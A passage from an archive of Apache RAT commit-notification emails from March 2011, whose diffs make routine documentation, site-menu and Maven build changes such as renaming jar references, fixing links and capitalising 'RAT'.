@@ Running RAT Run from the command line with: +------------------------------------------+ -java -jar rat-app-VERSION.jar --help +java -jar apache-rat-VERSION.jar --help +------------------------------------------+ Where VERSION is replaced with the version number you are working with. This will output a help message detailing the command line -options available to you. + options available to you. * Running with Apache Ant From [email protected] Sat Mar 19 11:18:52 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97039 invoked from network); 19 Mar 2011 11:18:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 11:18:51 -0000 Received: (qmail 70648 invoked by uid 500); 19 Mar 2011 11:18:51 -0000 Delivered-To: [email protected] Received: (qmail 70625 invoked by uid 500); 19 Mar 2011 11:18:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70618 invoked by uid 99); 19 Mar 2011 11:18:51 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 11:18:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 11:18:51 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E42CA23889E5; Sat, 19 Mar 2011 11:18:28 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083165 - /incubator/rat/main/trunk/apache-rat/src/site/apt/index.apt Date: Sat, 19 Mar 2011 11:18:28 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: dennisl Date: Sat Mar 19 11:18:28 2011 New Revision: 1083165 URL: http://svn.apache.org/viewvc?rev=1083165&view=rev Log: Indent the paragraphs, so that they don't appear as headings. Modified: incubator/rat/main/trunk/apache-rat/src/site/apt/index.apt Modified: incubator/rat/main/trunk/apache-rat/src/site/apt/index.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat/src/site/apt/index.apt?rev=1083165&r1=1083164&r2=1083165&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat/src/site/apt/index.apt (original) +++ incubator/rat/main/trunk/apache-rat/src/site/apt/index.apt Sat Mar 19 11:18:28 2011 @@ -36,15 +36,15 @@ java -jar rat-VERSION.jar --help working with. This will output a help message detailing the command line -options available to you. + options available to you. * Adding licence headers -RAT can be used to automatically add licence headers to -files that do not currently have them. Only files that -are not excluded by the RAT configurations will be affected. + RAT can be used to automatically add licence headers to + files that do not currently have them. Only files that + are not excluded by the RAT configurations will be affected. -To add licence headers use a command such as: + To add licence headers use a command such as: +------------------------------------------+ java -jar rat-VERSION.jar --addLicence @@ -52,7 +52,7 @@ java -jar rat-VERSION.jar --addLicence /path/to/project +------------------------------------------+ -This command will add the licence header directly to the -source files. If you prefer to see which files will be -changed and how then remove the "--force" option. + This command will add the licence header directly to the + source files. If you prefer to see which files will be + changed and how then remove the "--force" option. From [email protected] Sat Mar 19 12:43:59 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70695 invoked from network); 19 Mar 2011 12:43:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 12:43:59 -0000 Received: (qmail 18493 invoked by uid 500); 19 Mar 2011 12:43:59 -0000 Delivered-To: [email protected] Received: (qmail 18472 invoked by uid 500); 19 Mar 2011 12:43:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18465 invoked by uid 99); 19 Mar 2011 12:43:59 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 12:43:59 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 12:43:56 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7391F238897A; Sat, 19 Mar 2011 12:43:33 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083174 - in /incubator/rat/main/trunk/apache-rat-plugin/src/site/apt: index.apt usage.apt Date: Sat, 19 Mar 2011 12:43:33 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: dennisl Date: Sat Mar 19 12:43:33 2011 New Revision: 1083174 URL: http://svn.apache.org/viewvc?rev=1083174&view=rev Log: Fix broken links. Modified: incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/usage.apt Modified: incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt?rev=1083174&r1=1083173&r2=1083174&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt (original) +++ incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt Sat Mar 19 12:43:33 2011 @@ -30,10 +30,10 @@ The Rat Maven Plugin The following goals are available: - * {{{check.html}rat:check}} Runs RAT and creates a report, which is written + * {{{check-mojo.html}rat:check}} Runs RAT and creates a report, which is written to a plain text file. - * {{{rat.html}rat:rat}} Runs RAT and creates a report, which will be added + * {{{rat-mojo.html}rat:rat}} Runs RAT and creates a report, which will be added to the generated site. * Usage Modified: incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/usage.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/usage.apt?rev=1083174&r1=1083173&r2=1083174&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/usage.apt (original) +++ incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/usage.apt Sat Mar 19 12:43:33 2011 @@ -52,7 +52,7 @@ Usage ------------------------------------------------------------------ An example for running the plugin automatically can be found - {{{examples/verify.apt}here}}. + {{{examples/verify.html}here}}. *Adding the report to the generated site From [email protected] Sat Mar 19 22:28:52 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16528 invoked from network); 19 Mar 2011 22:28:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 22:28:51 -0000 Received: (qmail 41501 invoked by uid 500); 19 Mar 2011 22:28:51 -0000 Delivered-To: [email protected] Received: (qmail 41479 invoked by uid 500); 19 Mar 2011 22:28:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41472 invoked by uid 99); 19 Mar 2011 22:28:51 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 22:28:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 22:28:51 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7D4AF23888C2; Sat, 19 Mar 2011 22:28:28 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083315 - in /incubator/rat/main/trunk: apache-rat-core/src/site/apt/index.apt apache-rat/src/site/apt/index.apt Date: Sat, 19 Mar 2011 22:28:28 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: dennisl Date: Sat Mar 19 22:28:28 2011 New Revision: 1083315 URL: http://svn.apache.org/viewvc?rev=1083315&view=rev Log: Fix the instructions for running RAT. Modified: incubator/rat/main/trunk/apache-rat-core/src/site/apt/index.apt incubator/rat/main/trunk/apache-rat/src/site/apt/index.apt Modified: incubator/rat/main/trunk/apache-rat-core/src/site/apt/index.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/site/apt/index.apt?rev=1083315&r1=1083314&r2=1083315&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/site/apt/index.apt (original) +++ incubator/rat/main/trunk/apache-rat-core/src/site/apt/index.apt Sat Mar 19 22:28:28 2011 @@ -28,7 +28,7 @@ Release Audit Tool (RAT) Run from the command line with: +------------------------------------------+ -java -jar rat-VERSION.jar --help +java -jar apache-rat-VERSION.jar --help +------------------------------------------+ Where VERSION is replaced with the version number you are @@ -46,7 +46,7 @@ are not excluded by the RAT configuratio To add licence headers use a command such as: +------------------------------------------+ -java -jar rat-VERSION.jar --addLicence +java -jar apache-rat-VERSION.jar --addLicence --copyright "Copyright 2008 Foo" /path/to/project +------------------------------------------+ Modified: incubator/rat/main/trunk/apache-rat/src/site/apt/index.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat/src/site/apt/index.apt?rev=1083315&r1=1083314&r2=1083315&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat/src/site/apt/index.apt (original) +++ incubator/rat/main/trunk/apache-rat/src/site/apt/index.apt Sat Mar 19 22:28:28 2011 @@ -29,7 +29,7 @@ Release Audit Tool (RAT) Run from the command line with: +------------------------------------------+ -java -jar rat-VERSION.jar --help +java -jar apache-rat-VERSION.jar --help +------------------------------------------+ Where VERSION is replaced with the version number you are @@ -47,7 +47,7 @@ java -jar rat-VERSION.jar --help To add licence headers use a command such as: +------------------------------------------+ -java -jar rat-VERSION.jar --addLicence +java -jar apache-rat-VERSION.jar --addLicence --copyright "Copyright 2008 Foo" --force /path/to/project +------------------------------------------+ From [email protected] Sat Mar 19 22:39:46 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61214 invoked from network); 19 Mar 2011 22:39:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 22:39:45 -0000 Received: (qmail 45994 invoked by uid 500); 19 Mar 2011 22:39:45 -0000 Delivered-To: [email protected] Received: (qmail 45969 invoked by uid 500); 19 Mar 2011 22:39:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45962 invoked by uid 99); 19 Mar 2011 22:39:45 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 22:39:45 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 22:39:43 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 1D24223888C2; Sat, 19 Mar 2011 22:39:20 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083318 - in /incubator/rat/main/trunk: apache-rat-plugin/src/site/apt/index.apt src/site/apt/index.apt Date: Sat, 19 Mar 2011 22:39:20 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: dennisl Date: Sat Mar 19 22:39:19 2011 New Revision: 1083318 URL: http://svn.apache.org/viewvc?rev=1083318&view=rev Log: Use relative links between parent and child module. Modified: incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt incubator/rat/main/trunk/src/site/apt/index.apt Modified: incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt?rev=1083318&r1=1083317&r2=1083318&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt (original) +++ incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt Sat Mar 19 22:39:19 2011 @@ -21,7 +21,7 @@ The Rat Maven Plugin This plugin may be used to run RAT, the - {{{http://incubator.apache.org/rat/}Release Audit Tool}}. It + {{{../index.html}Release Audit Tool}}. It verifies, whether your source code matches standards like the {{{http://www.apache.org/legal/src-headers.html}ASF Source Header and Copyright Notice Policy}}. Modified: incubator/rat/main/trunk/src/site/apt/index.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/src/site/apt/index.apt?rev=1083318&r1=1083317&r2=1083318&view=diff ============================================================================== --- incubator/rat/main/trunk/src/site/apt/index.apt (original) +++ incubator/rat/main/trunk/src/site/apt/index.apt Sat Mar 19 22:39:19 2011 @@ -92,4 +92,4 @@ java -jar apache-rat-VERSION.jar --help RAT includes a plugin for Maven 2. This allows RAT reports to be run against a wide variety of resources. Details can be found in the - {{{http://incubator.apache.org/rat/apache-rat-plugin} plugin documentation}}. + {{{apache-rat-plugin/index.html} plugin documentation}}. From [email protected] Sat Mar 19 22:41:54 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61338 invoked from network); 19 Mar 2011 22:41:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 22:41:54 -0000 Received: (qmail 48580 invoked by uid 500); 19 Mar 2011 22:41:54 -0000 Delivered-To: [email protected] Received: (qmail 48555 invoked by uid 500); 19 Mar 2011 22:41:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48547 invoked by uid 99); 19 Mar 2011 22:41:54 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 22:41:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 22:41:51 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 9AADD23888C2; Sat, 19 Mar 2011 22:41:28 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083319 - /incubator/rat/main/trunk/apache-rat-plugin/src/site/site.xml Date: Sat, 19 Mar 2011 22:41:28 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: dennisl Date: Sat Mar 19 22:41:28 2011 New Revision: 1083319 URL: http://svn.apache.org/viewvc?rev=1083319&view=rev Log: Add the reports menu to be consistent with the other modules. Modified: incubator/rat/main/trunk/apache-rat-plugin/src/site/site.xml Modified: incubator/rat/main/trunk/apache-rat-plugin/src/site/site.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-plugin/src/site/site.xml?rev=1083319&r1=1083318&r2=1083319&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-plugin/src/site/site.xml (original) +++ incubator/rat/main/trunk/apache-rat-plugin/src/site/site.xml Sat Mar 19 22:41:28 2011 @@ -18,6 +18,7 @@ <project> <body> <menu ref="parent"/> + <menu name="Overview"> <item name="Introduction" href="index.html"/> <item name="Goals" href="plugin-info.html"/> @@ -30,5 +31,7 @@ <item name="Running the plugin automatically" href="examples/verify.html"/> <item name="Adding a report to the site" href="examples/site.html"/> </menu> + + <menu ref="reports"/> </body> </project> From [email protected] Sat Mar 19 22:45:18 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64193 invoked from network); 19 Mar 2011 22:45:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 22:45:18 -0000 Received: (qmail 50494 invoked by uid 500); 19 Mar 2011 22:45:18 -0000 Delivered-To: [email protected] Received: (qmail 50471 invoked by uid 500); 19 Mar 2011 22:45:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50464 invoked by uid 99); 19 Mar 2011 22:45:17 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 22:45:17 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 22:45:17 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 9062523888CD; Sat, 19 Mar 2011 22:44:54 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083322 - in /incubator/rat/main/trunk: apache-rat-plugin/src/changes/changes.xml apache-rat-plugin/src/site/apt/index.apt apache-rat-plugin/src/site/fml/faq.fml apache-rat-tasks/src/site/site.xml Date: Sat, 19 Mar 2011 22:44:54 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: dennisl Date: Sat Mar 19 22:44:54 2011 New Revision: 1083322 URL: http://svn.apache.org/viewvc?rev=1083322&view=rev Log: Spell RAT with the correct case. Modified: incubator/rat/main/trunk/apache-rat-plugin/src/changes/changes.xml incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt incubator/rat/main/trunk/apache-rat-plugin/src/site/fml/faq.fml incubator/rat/main/trunk/apache-rat-tasks/src/site/site.xml Modified: incubator/rat/main/trunk/apache-rat-plugin/src/changes/changes.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-plugin/src/changes/changes.xml?rev=1083322&r1=1083321&r2=1083322&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-plugin/src/changes/changes.xml (original) +++ incubator/rat/main/trunk/apache-rat-plugin/src/changes/changes.xml Sat Mar 19 22:44:54 2011 @@ -17,7 +17,7 @@ --> <document> <properties> - <title>Changes in the Rat Maven Plugin</title> + <title>Changes in the RAT Maven Plugin</title> </properties> <body> <release version="1.0-alpha-4" date="Not yet released"> Modified: incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt?rev=1083322&r1=1083321&r2=1083322&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt (original) +++ incubator/rat/main/trunk/apache-rat-plugin/src/site/apt/index.apt Sat Mar 19 22:44:54 2011 @@ -18,7 +18,7 @@ ------ -The Rat Maven Plugin +The RAT Maven Plugin This plugin may be used to run RAT, the {{{../index.html}Release Audit Tool}}. It @@ -38,11 +38,11 @@ The Rat Maven Plugin * Usage - Instructions on how to use the Rat Maven Plugin can be found on the {{{usage.html}usage page}}. + Instructions on how to use the RAT Maven Plugin can be found on the {{{usage.html}usage page}}. * Examples - To provide you with better understanding of some usages of the Rat Maven Plugin, + To provide you with better understanding of some usages of the RAT Maven Plugin, you can take a look into the following examples: * {{{examples/basic.html}Basic use}} of the rat:check goal. Modified: incubator/rat/main/trunk/apache-rat-plugin/src/site/fml/faq.fml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-plugin/src/site/fml/faq.fml?rev=1083322&r1=1083321&r2=1083322&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-plugin/src/site/fml/faq.fml (original) +++ incubator/rat/main/trunk/apache-rat-plugin/src/site/fml/faq.fml Sat Mar 19 22:44:54 2011 @@ -36,7 +36,7 @@ <question>Where do I find RAT?</question> <answer> <p> - Rat can be found <a href="http://incubator.apache.org/rat/"> + RAT can be found <a href="http://incubator.apache.org/rat/"> http://incubator.apache.org/rat/</a>. In other words, it is an incubating Apache project: Has been preliminarily accepted by the ASF, but not finally. Modified: incubator/rat/main/trunk/apache-rat-tasks/src/site/site.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-tasks/src/site/site.xml?rev=1083322&r1=1083321&r2=1083322&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-tasks/src/site/site.xml (original) +++ incubator/rat/main/trunk/apache-rat-tasks/src/site/site.xml Sat Mar 19 22:44:54 2011 @@ -14,7 +14,7 @@ limitations under the License. --> -<project name="Apache Rat (Incubating) Tasks"> +<project name="Apache RAT (Incubating) Tasks"> <body> <menu ref="parent"/> <menu ref="reports"/> From [email protected] Sat Mar 19 23:10:16 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59728 invoked from network); 19 Mar 2011 23:10:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Mar 2011 23:10:16 -0000 Received: (qmail 64192 invoked by uid 500); 19 Mar 2011 23:10:16 -0000 Delivered-To: [email protected] Received: (qmail 64168 invoked by uid 500); 19 Mar 2011 23:10:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64161 invoked by uid 99); 19 Mar 2011 23:10:16 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 23:10:16 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 19 Mar 2011 23:10:15 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 83C1123889B2; Sat, 19 Mar 2011 23:09:53 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083327 - in /incubator/rat/main/trunk: RELEASE_NOTES.txt apache-rat-plugin/pom.xml apache-rat-plugin/src/site/site.xml pom.xml src/site/site.xml Date: Sat, 19 Mar 2011 23:09:53 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: dennisl Date: Sat Mar 19 23:09:53 2011 New Revision: 1083327 URL: http://svn.apache.org/viewvc?rev=1083327&view=rev Log: Remove old outdated changes report in RAT Maven Plugin and copy the RELEASE_NOTES.txt to the main site and link to that instead. If you don't want to keep the file apache-rat-plugin/src/changes/changes.xml for historical reasons, it can now safely be removed. Modified: incubator/rat/main/trunk/RELEASE_NOTES.txt incubator/rat/main/trunk/apache-rat-plugin/pom.xml incubator/rat/main/trunk/apache-rat-plugin/src/site/site.xml incubator/rat/main/trunk/pom.xml incubator/rat/main/trunk/src/site/site.xml Modified: incubator/rat/main/trunk/RELEASE_NOTES.txt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/RELEASE_NOTES.txt?rev=1083327&r1=1083326&r2=1083327&view=diff ============================================================================== --- incubator/rat/main/trunk/RELEASE_NOTES.txt (original) +++ incubator/rat/main/trunk/RELEASE_NOTES.txt Sat Mar 19 23:09:53 2011 @@ -1,5 +1,6 @@ RAT 0.8 ======= + * Some website fixes * Issues Resolved (see http://issues.apache.org/jira): * Bug: * RAT-86 CLI doesn't allow adding of licenses unless a custom @@ -15,7 +16,7 @@ RAT 0.8 RAT 0.7 ======= - * some website fixes + * Some website fixes * Issues Resolved (see http://issues.apache.org/jira): * Bug: * RAT-62 Some of RATs own files missing License Headers Modified: incubator/rat/main/trunk/apache-rat-plugin/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-plugin/pom.xml?rev=1083327&r1=1083326&r2=1083327&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-plugin/pom.xml (original) +++ incubator/rat/main/trunk/apache-rat-plugin/pom.xml Sat Mar 19 23:09:53 2011 @@ -117,18 +117,6 @@ <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-plugin-plugin</artifactId> </plugin> - <plugin> - <groupId>org.apache.maven.plugins</groupId> - <artifactId>maven-changes-plugin</artifactId> - <version>2.0-beta-2</version> - <reportSets> - <reportSet> - <reports> - <report>changes-report</report> - </reports> - </reportSet> - </reportSets> - </plugin> </plugins> </reporting> Modified: incubator/rat/main/trunk/apache-rat-plugin/src/site/site.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-plugin/src/site/site.xml?rev=1083327&r1=1083326&r2=1083327&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-plugin/src/site/site.xml (original) +++ incubator/rat/main/trunk/apache-rat-plugin/src/site/site.xml Sat Mar 19 23:09:53 2011 @@ -24,7 +24,6 @@ <item name="Goals" href="plugin-info.html"/> <item name="Usage" href="usage.html"/> <item name="FAQ" href="faq.html"/> - <item name="Changes" href="changes-report.html"/> </menu> <menu name="Examples"> <item name="Basic use" href="examples/basic.html"/> Modified: incubator/rat/main/trunk/pom.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/pom.xml?rev=1083327&r1=1083326&r2=1083327&view=diff ============================================================================== --- incubator/rat/main/trunk/pom.xml (original) +++ incubator/rat/main/trunk/pom.xml Sat Mar 19 23:09:53 2011 @@ -218,6 +218,26 @@ Note that binary compatibility is not ga </plugin> </plugins> </pluginManagement> + <plugins> + <plugin> + <groupId>org.apache.maven.plugins</groupId> + <artifactId>maven-antrun-plugin</artifactId> + <executions> + <execution> + <phase>pre-site</phase> + <id>copy-site-resources</id> + <goals> + <goal>run</goal> + </goals> + <configuration> + <tasks> + <copy file="RELEASE_NOTES.txt" todir="${project.build.directory}/site/" failonerror="false" /> + </tasks> + </configuration> + </execution> + </executions> + </plugin> + </plugins> </build> <issueManagement> Modified: incubator/rat/main/trunk/src/site/site.xml URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/src/site/site.xml?rev=1083327&r1=1083326&r2=1083327&view=diff ============================================================================== --- incubator/rat/main/trunk/src/site/site.xml (original) +++ incubator/rat/main/trunk/src/site/site.xml Sat Mar 19 23:09:53 2011 @@ -19,6 +19,7 @@ <menu name="RAT"> <item name="Home" href="/index.html"/> <item name="Downloads" href="/downloads.html"/> + <item name="Changes" href="/RELEASE_NOTES.txt"/> </menu> <menu ref="modules"/> From [email protected] Sun Mar 20 17:27:11 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98945 invoked from network); 20 Mar 2011 17:27:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Mar 2011 17:27:11 -0000 Received: (qmail 21233 invoked by uid 500); 20 Mar 2011 17:27:11 -0000 Delivered-To: [email protected] Received: (qmail 21203 invoked by uid 500); 20 Mar 2011 17:27:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21196 invoked by uid 99); 20 Mar 2011 17:27:11 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 20 Mar 2011 17:27:11 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 20 Mar 2011 17:27:09 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 9213223888E7; Sun, 20 Mar 2011 17:26:45 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1083516 - /incubator/rat/main/trunk/apache-rat-core/src/site/apt/index.apt Date: Sun, 20 Mar 2011 17:26:45 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email 